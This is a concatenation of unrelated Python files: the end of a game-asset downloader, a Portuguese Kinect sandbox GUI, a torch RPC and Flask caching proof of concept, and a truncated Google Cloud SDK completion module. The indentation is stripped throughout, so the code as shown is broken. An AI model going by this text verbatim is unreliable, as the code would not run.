istr = str(ilog)+","
logfile.write(istr)
logfile.write("\n")
if __name__ == '__main__':
main()
os.system("pause")
#appendix
#weapon
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/m/1040001600.jpg
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/b/1040001600.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/ls/1040500300.jpg
#image set
#character origin zoom
#skin
#3710001000
# http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/zoom/3040010000_01.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/b/3030007000_01.png
#class
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/job_change/120001_wa_1_01.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/cjs/job_release_180001_1_c.png
#quest character 2 3 4 99
#http://game-a1.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/3040022000.png
#summon 1 2 3 4
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/summon/b/2030011000.png
#mypage class&sr
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/my/3040058000_02.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/my/140201_kn_1_01.png
#not used
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/npc_evolution/main/3040071000_02.png
|
main.py
|
import tkinter as tk
from tkinter import ttk
from cv2 import equalizeHist
import numpy as np
import cv2
from openni import openni2
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import cm
from matplotlib.ticker import LinearLocator
import threading
#==========================================================================================
#create interface
janela = tk.Tk()
h = janela.winfo_screenheight()
w = janela.winfo_screenwidth()
janela.geometry("%dx%d+%d+%d" % (570, 650, ((w/2) - (570/2)),((h/2) - (680/2))))
janela.title("Interface em desenvolvimento")
janela.resizable(width=0, height=0)
a = 10
b = 30
c = 10
d = 25
#==========================================================================================
#variables
var1 = tk.IntVar()
check2 = ttk.Checkbutton(janela, text='Cores', variable= var1)
check2.place(height=20, width=100, x=a, y=(c + 7*b))
var2 = tk.IntVar()
check2 = ttk.Checkbutton(janela, text='Curvas', variable= var2)
check2.place(height=20, width=100, x=6*a + 7, y=(c + 7*b))
selected_gradient = tk.StringVar()
lt = ['COLORMAP_AUTUMN','COLORMAP_BONE' ,
'COLORMAP_JET(PADRÃO)' ,
'COLORMAP_WINTER' ,
'COLORMAP_RAINBOW' ,
'COLORMAP_OCEAN',
'COLORMAP_SUMMER',
'COLORMAP_SPRING',
'COLORMAP_COOL',
'COLORMAP_HSV',
'COLORMAP_PINK',
'COLORMAP_HOT',
'COLORMAP_PARULA',
'COLORMAP_MAGMA',
'COLORMAP_INFERNO',
'COLORMAP_PLASMA',
'COLORMAP_VIRIDIS',
'COLORMAP_CIVIDIS',
'COLORMAP_TWILIGHT',
'COLORMAP_TWILIGHT_SHIFTED',
'COLORMAP_TURBO',
'COLORMAP_DEEPGREEN']
gradi = ttk.Combobox(janela, values = lt, textvariable= selected_gradient)
gradi.set('Estilo de Colormap')
gradi['state'] = 'readonly'
gradi.place(height=20, width=170, x=13*a, y=(c + 7*b))
var3 = tk.IntVar()
list_numbers_curv= [1,3,5,8,10,15,20,30]
numbers_curv = ttk.Combobox(janela, values = list_numbers_curv, textvariable= var3)
numbers_curv.set('Fator de Distância')
numbers_curv['state'] = 'readonly'
numbers_curv.place(height=20, width=125, x=31*a - 8, y=(c + 7*b))
var4 = tk.IntVar()
list_thickness_curv = [1,2,3,4,5,6,7,8]
thickness_curv = ttk.Combobox(janela, values =list_thickness_curv, textvariable= var4)
thickness_curv.set('Espessura da Linha')
thickness_curv['state'] = 'readonly'
thickness_curv.place(height=20, width=125, x=42*a + 9 , y=(c + 7*b))
set_heigth = tk.IntVar()
set_entry = tk.Entry(janela,textvariable = set_heigth)
set_entry.place(height=20, width=50, x=15*a, y=(c + 3*b))
var_a = tk.IntVar()
check_a = ttk.Checkbutton(janela, text='Exibir Altura', variable= var_a)
check_a.place(height=20, width=150, x=a, y=(c + 4*b))
#==========================================================================================
#Initializing kinect and variables
#==========================================================================================
alt_max = 0
dist = 0
found_box = 0
key_set = []
list_var = [2, 1, 1, 5, 1, False]
points_area = []
closed_cal = False
openni2.initialize()
#==========================================================================================
#curve visualization
#==========================================================================================
def exibe_curvas_de_nivel():
"""
    Displays the contour (level-curve) view of the captured depth image.
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
n_curvas_de_nivel=30
x_label=np.arange((points_area[0]), points_area[2], 1)
y_label=np.arange((points_area[1]), points_area[3], 1)
x_label, y_label = np.meshgrid(x_label, y_label)
z_label = np.reshape(img, (480, 640))
z_label = z_label[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
z_label = np.rot90(z_label, 2)
if alt_max == 0:
z_label = np.clip(z_label,(found_box - 400), (found_box))
else:
z_label = np.clip(z_label,(found_box - alt_max), (found_box))
img_d1 = np.ones(np.shape(z_label))*(np.amax(z_label))
z_label = img_d1 - z_label
initial_cmap = cm.get_cmap('jet')
fig, ax = plt.subplots()
CS = ax.contour(x_label, y_label, z_label, n_curvas_de_nivel, cmap= initial_cmap)
ax.clabel(CS, fontsize=9, inline=True)
ax.set_title('Curva de nível')
plt.show()
#==========================================================================================
#3D visualization
#==========================================================================================
def exibe_3d():
"""
    Displays the captured depth image as a 3D surface plot.
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
x_label=np.arange((points_area[0]), points_area[2], 1)
y_label=np.arange((points_area[1]), points_area[3], 1)
x_label, y_label = np.meshgrid(x_label, y_label)
z_label = np.reshape(img, (480, 640))
z_label = z_label[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
if alt_max == 0:
z_label = np.clip(z_label,(found_box - 400), (found_box))
else:
z_label = np.clip(z_label,(found_box - alt_max), (found_box))
img_d1 = np.ones(np.shape(z_label))*(np.amax(z_label))
z_label = img_d1 - z_label
initial_cmap = cm.get_cmap('jet')
fig, ax = plt.subplots(subplot_kw={"projection": "3d"})
surf = ax.plot_surface(x_label, y_label, z_label, cmap= initial_cmap, linewidth=0, antialiased=True)
ax.zaxis.set_major_formatter('{x:.02f}')
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
#==========================================================================================
#display in real time
#==========================================================================================
def exib_TR(mapoption = list_var[0], walloption= list_var[1], curv = list_var[2], n=list_var[3],
thicknesscurv= list_var[4], h= 100, w= 100, pos1= 1700,alt_max= alt_max ):
"""
    Displays the depth image in real time with the selected colormap and,
    optionally, contour lines drawn on top of it.
    :param mapoption: OpenCV colormap constant applied to the depth image
    :param walloption: 0 draws the contours on a white background, 1 on the colormap image
    :param curv: 1 enables contour drawing
    :param n: distance factor between contour levels
    :param thicknesscurv: contour line thickness
    :param h: height of the warped output image
    :param w: width of the warped output image
    :param pos1: reference depth of the box bottom used for clipping
    :param alt_max: maximum height above the box bottom kept after clipping
:return:
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
botao_exibTR["state"] = tk.DISABLED
botao_calibration1["state"] = tk.DISABLED
botao_calibration2["state"] = tk.DISABLED
def onMouse2(event, x, y, flags, param):
global dist
if event == cv2.EVENT_MOUSEMOVE:
dist = img_d[y, x]
if (type(dist) == np.float32) and (np.isnan(dist)):
dist = int(np.nan_to_num(dist))
elif (type(dist) == np.float32):
dist = int(dist)
while(True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
if alt_max == 0:
img = np.clip(img,(pos1 - 400), (pos1))
else:
img = np.clip(img,(pos1 - alt_max), (pos1))
img = (np.ones(np.shape(img))*(np.amax(img))) - img
img_d = np.resize(img, (480, 640))
img_d = np.fliplr(img_d)[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = img[(480 -points_area[3]):(480 -points_area[1]), (640 - points_area[2]):(640 - points_area[0])]
alpha = 255 / ((np.amax(img) - np.amin(img)))
beta = -np.amin(img) * alpha
img = cv2.convertScaleAbs((img), alpha=alpha, beta = beta)
img = cv2.medianBlur(img, 19)
img = cv2.rotate(img, cv2.ROTATE_180)
im_color = cv2.applyColorMap(img, mapoption)
im_position = im_color
x = v1.get()
y = v2.get()
res = [x, y]
im_color = cv2.resize(im_color, res, interpolation=cv2.INTER_LINEAR)
imgray = cv2.cvtColor (im_color, cv2.COLOR_BGR2GRAY)
whitewall = (np.ones(im_color.shape))*255
if walloption == 0: wall = whitewall
elif walloption == 1: wall = im_color
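        # Contour curves: threshold the gray image at levels n, 2n, 3n, ... and
        # draw the resulting contours on the chosen background (wall).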
if curv == 1:
for i in range(255):
ret, thresh = cv2.threshold (imgray, (n*i), 255, cv2.THRESH_BINARY)
contours, his = cv2.findContours (thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(wall, contours, -1, (0,0,0), thicknesscurv)
deslocamento = np.float32([[1, 0, (v4.get())], [0, 1,( v5.get())]])
wall = cv2.warpAffine(wall, deslocamento, (w, h))
ponto = ((v4.get() + (x/2)), (v5.get() + (y/2)))
rotacao = cv2.getRotationMatrix2D(ponto, v3.get(), 1.0)
wall = cv2.warpAffine(wall, rotacao, (w, h))
cv2.imshow("Tempo Real", (wall))
if (var_a.get() == 1):
cv2.imshow("Altitude", im_position)
cv2.setMouseCallback("Altitude", onMouse2)
texto_view_alt["text"] = "(Mova o Cursor Sobre a Imagem): " + str(dist) + " mm"
cv2.waitKey(34)
if (cv2.getWindowProperty("Altitude", cv2.WND_PROP_VISIBLE) <1) and (var_a.get() == 1):
var_a.set(0)
texto_view_alt["text"] = ""
if (cv2.getWindowProperty("Altitude", cv2.WND_PROP_VISIBLE) >= 1) and (var_a.get() == 0):
cv2.destroyWindow("Altitude")
texto_view_alt["text"] = ""
if (cv2.getWindowProperty("Tempo Real", cv2.WND_PROP_VISIBLE) <1) or (list_var[5] == True):
texto_view_alt["text"] = ""
botao_exibTR["state"] = tk.NORMAL
botao_calibration1["state"] = tk.NORMAL
botao_calibration2["state"] = tk.NORMAL
list_var[5] = False
break
cv2.destroyAllWindows()
#==========================================================================================
#initial calibration
#==========================================================================================
def cal_inicial():
global points_area
dev = openni2.Device.open_any()
depth_stream= dev.create_depth_stream()
depth_stream.start()
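    # Calibration flow: the user clicks the top-left and then the bottom-right
    # corner of the box in the "Selecionar" window; the two clicks populate
    # points_area with the crop rectangle used by the other views.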
tk.messagebox.showinfo("Info", "Clique sobre o vértice superior esquerdo da caixa, depois sobre o vértice inferior direito da caixa.")
if len(points_area) != 0:
points_area = []
def onMouse1(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
points_area.append(x)
points_area.append(y)
cv2.namedWindow("Selecionar", cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback("Selecionar", onMouse1)
while (True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = cv2.convertScaleAbs((img), alpha=0.1)
img = cv2.medianBlur(img, 23)
img = equalizeHist(img)
img = cv2.bitwise_not(img)
img = cv2.rotate(img, cv2.ROTATE_180)
cframe_data = cv2.applyColorMap(img, cv2.COLORMAP_JET)
if len(points_area) == 4:
if (points_area[0] >= points_area[2]) or (points_area[1] >= points_area[3]):
tk.messagebox.showinfo("Info", "Clique sobre o vértice superior esquerdo da caixa, depois sobre o vértice inferior direito. Calibre novamente")
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
else:
cframe_data = cframe_data[points_area[1]:points_area[3], points_area[0]: points_area[2]]
cv2.imshow("Selecionar", cframe_data)
cv2.waitKey(34)
if (cv2.getWindowProperty("Selecionar", cv2.WND_PROP_VISIBLE) <1):
if (len(points_area) != 4):
tk.messagebox.showinfo("Info", "Calibre a área da caixa")
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
elif (found_box != 0):
botao_aplic["state"] = tk.NORMAL
botao_exibTR["state"] = tk.NORMAL
botao_curv["state"] = tk.NORMAL
botao_surface["state"] = tk.NORMAL
break
else:
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
if (closed_cal == True):
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
cv2.destroyAllWindows()
#==========================================================================================
#set reference
#==========================================================================================
def set_f():
global key_set
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
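    # Reference calibration: the user clicks the bottom of the box in the "Alt"
    # window and the depth value under the cursor becomes the found_box reference.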
if len(key_set) != 0:
key_set = []
def onMouse2(event, x, y, flags, param):
global found_box
if event == cv2.EVENT_LBUTTONDOWN:
found_box = img_d[y, x]
key_set.append(x)
if (type(found_box ) == np.float32) and (np.isnan(found_box )):
found_box = int(np.nan_to_num(found_box ))
elif (type(found_box ) == np.float32):
found_box = int(found_box )
while(True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
img_d = np.resize(img, (480, 640))
img_d = np.fliplr(img_d)
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = cv2.convertScaleAbs((img), alpha=0.1)
img = cv2.medianBlur(img, 23)
img = equalizeHist(img)
img = cv2.bitwise_not(img)
img = cv2.rotate(img, cv2.ROTATE_180)
im_color = cv2.applyColorMap(img, cv2.COLORMAP_JET)
cv2.imshow("Alt", (im_color))
cv2.setMouseCallback("Alt", onMouse2)
cv2.waitKey(34)
if (cv2.getWindowProperty("Alt", cv2.WND_PROP_VISIBLE) <1):
tk.messagebox.showinfo("Info", "Selecione distância")
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
if (len(key_set) != 0):
if (len(points_area) == 4):
botao_aplic["state"] = tk.NORMAL
botao_exibTR["state"] = tk.NORMAL
botao_curv["state"] = tk.NORMAL
botao_surface["state"] = tk.NORMAL
break
else:
break
if (closed_cal == True):
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
cv2.destroyAllWindows()
#==========================================================================================
#change parameters
#==========================================================================================
def maplic():
global list_var
if ((thickness_curv.current() != -1) and (numbers_curv.current() != -1) and (gradi.current() != -1)):
list_var = [gradi.current(),var1.get(),var2.get(),var3.get(),var4.get(), True]
botao_exibTR["state"] = tk.NORMAL
texto_change.place(height=25, width=300, x=22*a, y=(c + 8*b))
else:
tk.messagebox.showerror("Erro", "Defina todos os paramêtros")
#==========================================================================================
#preview permissions
#==========================================================================================
def fal():
texto_change.place_forget()
list_var[5] = False
if list_var == [2, 1, 1, 5, 1, False]:
tk.messagebox.showinfo("Info", "Parâmetros padrão executados")
#==========================================================================================
#set altitude values
#==========================================================================================
def set_alt():
    global alt_max
    list_var[5] = True
    try:
        alt_max = int(set_heigth.get())
    except (ValueError, tk.TclError):
        tk.messagebox.showinfo("Info", "Digite a distância no formato inteiro, em milímetros")
#==========================================================================================
#quit
#==========================================================================================
def quit_sand():
global closed_cal
list_var[5] = True
closed_cal = True
if tk.messagebox.askokcancel("Sair", "Deseja fechar SandBox?"):
janela.destroy()
else:
list_var[5] = False
closed_cal = False
#==========================================================================================
#Separators
sep1 =ttk.Separator(janela, orient='horizontal')
sep1.place(x=0, y=(d + 2*b), relwidth=1)
sep2 =ttk.Separator(janela, orient='horizontal')
sep2.place(x=0, y=(d + 5*b), relwidth=1)
sep3 =ttk.Separator(janela, orient='horizontal')
sep3.place(x=0, y=(d + 9*b), relwidth=1)
sep4 =ttk.Separator(janela, orient='horizontal')
sep4.place(x=0, y=(d + 16*b), relwidth=1)
sep5 =ttk.Separator(janela, orient='horizontal')
sep5.place(x=0, y=(d + 19*b), relwidth=1)
#==========================================================================================
#scales
v1 = tk.IntVar()
s1 = ttk.Scale( janela, variable = v1,
from_ = 1, to = w,
orient = "horizontal")
s1.set(w/2)
s1.place(height=20, width=400, x=a, y=(c + 11*b))
v2 = tk.IntVar()
s2 = ttk.Scale( janela, variable = v2,
from_ = 1, to = h,
orient = "horizontal")
s2.set(h/2)
s2.place(height=20, width=400, x=a, y=(c + 12*b))
v4 = tk.IntVar()
s4 = ttk.Scale( janela, variable = v4,
from_ = 0, to = w,
orient = "horizontal")
s4.set(w/2)
s4.place(height=20, width=400, x=a, y=(c + 13*b))
v5 = tk.IntVar()
s5 = ttk.Scale( janela, variable = v5,
from_ = 0, to = h,
orient = "horizontal")
s5.set(h/2)
s5.place(height=20, width=400, x=a, y=(c + 14*b))
v3 = tk.IntVar()
s3 = ttk.Scale( janela, variable = v3,
from_ = -180, to = 180,
orient = "horizontal")
s3.set(0)
s3.place(height=20, width=400, x=a, y=(c + 15*b))
#==========================================================================================
#text
texto_calibration1 = ttk.Label(janela, text=" \u27f6 Selecione a Área da Caixa")
texto_calibration1.place(height=25, width=170, x=12*a, y=(15 + 0*b))
texto_calibration2 = ttk.Label(janela, text=" \u27f6 Selecione Fundo da Caixa")
texto_calibration2.place(height=25, width=170, x=12*a, y=(15 + 1*b))
texto_set = ttk.Label(janela, text="Altitude Máxima:")
texto_set.place(height=20, width=100, x=a, y=(c + 3*b))
texto_param = ttk.Label(janela, text="Defina os Parâmetros:")
texto_param.place(height=20, width=300, x=a, y=(c + 6*b))
texto_comp = ttk.Label(janela, text="Comprimento")
texto_comp.place(height=20, width=100, x=44*a, y=(c + 11*b))
texto_larg = ttk.Label(janela, text="Largura")
texto_larg.place(height=20, width=100, x=44*a, y=(c + 12*b))
texto_moveh = ttk.Label(janela, text="Mover (Horizontal)")
texto_moveh.place(height=20, width=115, x=44*a, y=(c + 13*b))
texto_movev = ttk.Label(janela, text="Mover (Vertical)")
texto_movev.place(height=20, width=110, x=44*a, y=(c + 14*b))
texto_girar = ttk.Label(janela, text="Girar")
texto_girar.place(height=20, width=110, x=44*a, y=(c + 15*b))
texto_proj = ttk.Label(janela, text="Projete e Ajuste: (Win + P) \u27f6 (Estender) \u27f6 (Mova a Imagem)")
texto_proj.place(height=25, width=400, x=a, y=(c + 10*b))
texto_change = ttk.Label(janela, text="Parâmetros Alterados, Pressione Exibir.")
texto_mod = ttk.Label(janela, text="Modos de Exibição:")
texto_mod.place(height=25, width=250, x=a, y=(c + 17*b))
texto_view_alt = ttk.Label(janela, text="")
texto_view_alt.place(height=20, width=280, x=10*a, y=(c + 4*b))
#==========================================================================================
#button
botao_calibration1 = ttk.Button(janela, text="Calibrar", command= lambda: threading.Thread(target=cal_inicial).start())
botao_calibration1.place(height=25, width=100, x=a, y=(15 + 0*b))
botao_calibration2 = ttk.Button(janela, text="Calibrar", command= lambda: threading.Thread(target=set_f).start())
botao_calibration2.place(height=25, width=100,x=a, y=(15 + 1*b))
botao_set_top = ttk.Button(janela, text="Set", command= lambda: set_alt())
botao_set_top.place(height=22, width=75, x=21*a, y=(c + 3*b))
botao_exibTR = ttk.Button(janela, text="Exibir", command= lambda:[fal(), threading.Thread(target=exib_TR, args= (list_var[0],list_var[1],
list_var[2],list_var[3],list_var[4], h, w, found_box, alt_max)).start()])
botao_exibTR.place(height=25, width=100, x=a, y=(c + 8*b))
botao_exibTR["state"] = tk.DISABLED
botao_aplic = ttk.Button(janela, text="Aplicar", command= lambda: maplic())
botao_aplic.place(height=25, width=100, x=11*a, y=(c + 8*b))
botao_aplic["state"] = tk.DISABLED
botao_curv = ttk.Button(janela, text="Exibir Curvas", command= lambda: exibe_curvas_de_nivel())
botao_curv.place(height=25, width=100,x=a, y=(c + 18*b))
botao_curv["state"] = tk.DISABLED
botao_surface = ttk.Button(janela, text="Exibir Superfície", command= lambda: exibe_3d())
botao_surface.place(height=25, width=100, x=11*a, y=(c + 18*b))
botao_surface["state"] = tk.DISABLED
botao_exit = ttk.Button(janela, text="Sair", command= lambda: quit_sand())
botao_exit.place(height=25, width=75, x=48*a, y=(10 + 20*b))
#==========================================================================================
#image
imagem = tk.PhotoImage(file="Nero_Preto_SemFundo.PNG")
imagem = imagem.subsample(8, 8)
im = ttk.Label(janela, image=imagem)
im.place(height=25, width=110, x=a, y=(10 + 20*b))
janela.protocol("WM_DELETE_WINDOW", quit_sand)
janela.mainloop()
|
poc.py
|
import os
import time
import torch
torch.multiprocessing.set_sharing_strategy("file_system")
import torch.multiprocessing as mp
import torch.distributed.rpc as rpc
from collections import deque
import datetime
import requests
from flask import Flask
from flask import request
import logging
no_of_saver_processes = 1
world_size = 2 # torch.cuda.device_count()
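# Overall flow (as implemented below): one CPU "saver" process joins the RPC
# group, serves cached features over a Flask endpoint, and each CUDA worker
# periodically pushes a feature dict to it via rpc.remote.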
class feature_cache:
def __init__(self):
self.data = deque([])
def __call__(self, t):
self.data.append(t)
def get(self):
if len(self.data) > 0:
return dict(l=len(self.data), d=self.data.popleft())
else:
return dict(l=len(self.data), d="EMPTY")
def flask_processing(feature_cache_obj):
print("Starting flask_processing")
app = Flask(__name__)
    # Suppress Flask/werkzeug request logging below ERROR so it does not clutter the main process's console input
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
@app.route("/data")
def hello():
return feature_cache_obj.get()
@app.route("/shutdown", methods=["POST"])
def shutdown():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
return "Server shutting down..."
app.run(host="0.0.0.0", port="9999", debug=False)
return
class cpu_process:
feature_cache_obj = feature_cache()
def __init__(self, rank):
print(f"cpu_process_initialization with rank {rank}")
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "5555"
rpc.init_rpc(
"saver",
rank=rank,
world_size=world_size + no_of_saver_processes,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
rpc_timeout=0, init_method="env://"
),
)
print(f"Started CPU process {rank}")
cpu_process.run()
@classmethod
def run(cls):
flask_processing(cls.feature_cache_obj)
cpu_process.shutdown()
@staticmethod
def shutdown():
for i in range(world_size):
_ = rpc.remote(f"{i}", cuda_process.shutdown, timeout=0)
rpc.shutdown()
return
@staticmethod
def cacher(t):
cpu_process.feature_cache_obj(t)
class cuda_process:
keep_running = True
def __init__(self, rank):
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "5555"
rpc.init_rpc(
f"{rank}",
rank=rank,
world_size=world_size + no_of_saver_processes,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
rpc_timeout=0, init_method="env://"
),
)
print(f"Started CUDA process on gpu {rank}")
        # Sleep to give the saver process some time to initialize
time.sleep(5)
self.run(rank)
rpc.shutdown()
return
@classmethod
def shutdown(cls):
cls.keep_running = False
def run(self, rank):
print(f"Started CUDA process on gpu {rank}")
while cuda_process.keep_running:
_ = rpc.remote(
"saver",
cpu_process.cacher,
timeout=0,
args=(
dict(
time=str(datetime.datetime.now()),
data=(torch.ones(10) * rank).tolist(),
),
),
)
time.sleep(5)
return
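# A minimal sketch, not part of the original flow: how an external consumer
# could poll the saver's Flask endpoint for cached features. The host and port
# below match the app.run() call in flask_processing(); adjust if that changes.
def poll_features_once(host="localhost", port=9999):
    """Fetch one cached feature dict from the saver process, or None if the cache is empty."""
    resp = requests.get(f"http://{host}:{port}/data")
    payload = resp.json()
    return None if payload["d"] == "EMPTY" else payload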
if __name__ == "__main__":
mp.set_start_method("forkserver", force=True)
print("Starting CPU processes")
p = mp.Process(target=cpu_process, args=(world_size,))
p.start()
print("Starting CUDA processes")
trainer_processes = mp.spawn(cuda_process, nprocs=world_size, join=False)
print("Joining all processes")
print(" IMPORTANT: For a graceful shutdown enter [y/Y] ".center(90, "-"))
s = input()
print(f"Registered {s}")
if s == "y" or s == "Y":
requests.post("http://localhost:9999/shutdown")
trainer_processes.join()
p.join()
print("Processes joined ... Ending")
|
remote_completion.py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Remote resource completion and caching."""
import abc
import os
import StringIO
import tempfile
import threading
import time
from googlecloudsdk.core import config
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
from googlecloudsdk.core.resource import resource_registry
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
_RESOURCE_FLAGS = {
'compute.projects': ' --project ',
'compute.regions': ' --region ',
'compute.zones': ' --zone ',
'sql.projects': ' --project '
}
_OPTIONAL_PARMS = {
'compute': [
{'project': lambda parsed_args: parsed_args.project},
{'region': lambda parsed_args: parsed_args.region},
{'zone': lambda parsed_args: parsed_args.zone},
],
'sql': [
{'instance': lambda parsed_args: parsed_args.instance},
{'project': lambda parsed_args: parsed_args.project},
],
}
class CompletionProgressTracker(object):
"""A context manager for telling the user about long-running completions."""
SPIN_MARKS = [
'|',
'/',
'-',
'\\',
]
def __init__(self, ofile, timeout=3.0, autotick=True):
self._ticks = 0
self._autotick = autotick
self._done = False
self._lock = threading.Lock()
self.ofile = ofile
self.timeout = timeout
self.has_forked = False # set when a child process is created
def __enter__(self):
if self._autotick:
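      # Ticker runs in a background thread: it advances the spinner and, once
      # the timeout expires, writes '?' and forks so that one copy of the
      # process can return control to the shell promptly (see RunListCommand).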
def Ticker():
time.sleep(.2)
self.timeout -= .2
while True:
if self.timeout < 0:
self.ofile.write('?\b')
self.ofile.flush()
os.fork()
# the next line indicates that the tracker has forked() the process
self.has_forked = True
return
time.sleep(.1)
self.timeout -= .1
if self.Tick():
return
threading.Thread(target=Ticker).start()
return self
def Tick(self):
"""Give a visual indication to the user that some progress has been made."""
with self._lock:
if not self._done:
self._ticks += 1
self.ofile.write(
CompletionProgressTracker.SPIN_MARKS[
self._ticks % len(CompletionProgressTracker.SPIN_MARKS)] + '\b')
self.ofile.flush()
return self._done
def __exit__(self, unused_type=None, unused_value=True,
unused_traceback=None):
with self._lock:
self.ofile.write(' \b')
self._done = True
def Iterate(obj, resource_refs, fun):
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return obj
return Iter(iter(obj), resource_refs, fun)
class Iter(object):
"""Create an iterator that extracts the names of objects.
Args:
items: List of items to iterate
resource_refs: List of resource_refs created by iterator.
"""
def __init__(self, items, resource_refs, fun):
self.items = items
self.resource_refs = resource_refs
self.fun = fun
def next(self):
"""Returns next item in list.
Returns:
Next Item in the list.
"""
item = self.items.next()
ref = self.fun(item)
self.resource_refs.append(ref)
return item
def __iter__(self):
return self
class _UpdateCacheOp(object):
"""The cache update operation base class."""
__metaclass__ = abc.ABCMeta
@staticmethod
@abc.abstractmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
pass
class AddToCacheOp(_UpdateCacheOp):
"""An AddToCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
for uri in uris:
completer.AddToCache(uri)
class DeleteFromCacheOp(_UpdateCacheOp):
"""An DeleteFromCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
for uri in uris:
completer.DeleteFromCache(uri)
class ReplaceCacheOp(_UpdateCacheOp):
"""An ReplaceCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
completer.StoreInCache(uris)
class RemoteCompletion(object):
"""Class to cache the names of remote resources."""
CACHE_HITS = 0
CACHE_TRIES = 0
_TIMEOUTS = { # Timeouts for resources in seconds
'sql.instances': 600,
'compute.instances': 600,
'compute.regions': 3600*10,
'compute.zones': 3600*10
}
ITEM_NAME_FUN = {
'compute': lambda item: item['name'],
'sql': lambda item: item.instance
}
@staticmethod
def CacheHits():
return RemoteCompletion.CACHE_HITS
@staticmethod
def CacheTries():
return RemoteCompletion.CACHE_TRIES
@staticmethod
def CachePath(self_link):
"""Returns cache path corresponding to self_link.
Args:
self_link: A resource selflink.
Returns:
A file path for storing resource names.
"""
ref = self_link.replace('https://', '')
lst = ref.split('/')
name = lst[-1]
lst[-1] = '_names_'
return [os.path.join(*lst), name]
@staticmethod
def ResetCache():
cache_dir = config.Paths().completion_cache_dir
if os.path.isdir(cache_dir):
files.RmTree(cache_dir)
def __init__(self):
"""Set the cache directory."""
try:
self.project = properties.VALUES.core.project.Get(required=True)
